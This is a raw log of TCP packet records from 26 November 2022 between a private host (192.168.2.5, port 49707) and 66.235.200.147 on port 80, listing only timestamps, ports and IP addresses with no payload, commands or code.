Nov 26, 2022 11:17:42.658174038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658175945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658194065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658195972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658211946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658230066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658230066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658248901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658267021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658267021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658284903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658304930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658324003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658324003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658343077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658344030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658361912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658376932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658380985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658400059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658417940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658437967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658441067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658457041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658464909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658476114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658488989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658493996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658512115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658529997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658536911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658550024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658567905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658570051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658586979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658606052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658626080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658629894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658643961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658653975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658663988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658682108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658683062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658701897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658720016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658720016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658739090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658757925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658776999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658778906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658796072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658802032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658816099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658833981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658834934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658854008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658871889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658873081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658900976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658919096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658936977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658957005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658974886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658993959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659012079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659030914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659049034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659068108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659085989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659104109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659117937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659132004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659140110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659140110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659140110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659140110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659140110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659146070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659161091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659179926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659190893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659198046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659215927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659219027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659234047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659238100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659252882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659270048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659272909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659288883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659307003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659307957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659328938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659348011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659367085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659372091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659387112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659389019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659405947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659425020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659432888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659442902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659457922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659461975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659481049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659502983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659512997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659521103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659533978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659539938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659559011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659576893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659590006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659596920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659615993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659616947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659636021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659650087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659653902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659673929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659693003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659707069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659712076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659730911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659732103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659749985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659765005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659769058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659787893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659806013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659821987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659826040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659843922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659845114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659862995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659879923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659881115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659899950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659915924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.659919024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659936905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659955025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659974098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.659977913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660001040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660069942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660088062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660105944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660114050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660124063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660141945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660161018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660165071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660180092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660186052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660198927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660218000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660224915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660235882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660254002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660254955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660271883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660290003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660309076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660309076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660326958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660332918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660346031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660365105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660367012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660383940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660402060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.660420895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.660445929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671442032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671478987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671503067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671526909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671539068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671552896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671575069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671575069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671597958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671622038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671626091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671644926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671668053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671690941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671694994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671715021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671719074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671737909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671761036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671785116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671791077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671808004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671818972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671833992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671857119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671881914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671906948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.671912909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.671936989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672039986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672063112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672084093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672086000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672108889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672110081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672130108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672151089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672174931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672177076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672198057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672200918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672220945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672244072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672266006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672267914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672291040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672478914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672512054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672535896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672559977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672573090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672584057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672585964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672606945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672630072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672631025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672653913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672677994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672700882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672708988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672723055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672730923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672745943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672769070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672791958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672792912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672813892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672816038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672840118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672862053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672885895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672890902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672908068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672918081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.672931910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672956944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.672980070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673002958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673003912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673027039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673028946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673049927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673073053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673079967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673093081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673095942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673119068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673144102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673146963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673166037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673190117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673214912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673217058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673237085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673240900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673261881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673285007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673307896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673311949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673333883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673335075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673357010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673378944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673403025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673403025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673424959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673428059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673448086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673470020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673497915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673521042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673682928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673723936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673747063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673769951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673794031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673799038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673818111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673823118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673841000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673863888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673887014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673891068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673908949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673916101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.673933029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673955917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673980951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.673986912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674004078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674006939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674026012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674048901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674072981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674072981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674096107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674098969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674119949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674144030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674168110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674169064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674190044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674194098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674212933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674236059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.674258947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.674283028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.675123930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.675311089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.675368071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.675498962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.675661087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.675734997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.675900936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.676008940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.676203966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.676254988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.676369905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.676518917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.676561117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.676841974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.676908970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.677009106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677093029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677189112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677239895 CET	49707	80	192.168.2.5	66.235.200.147
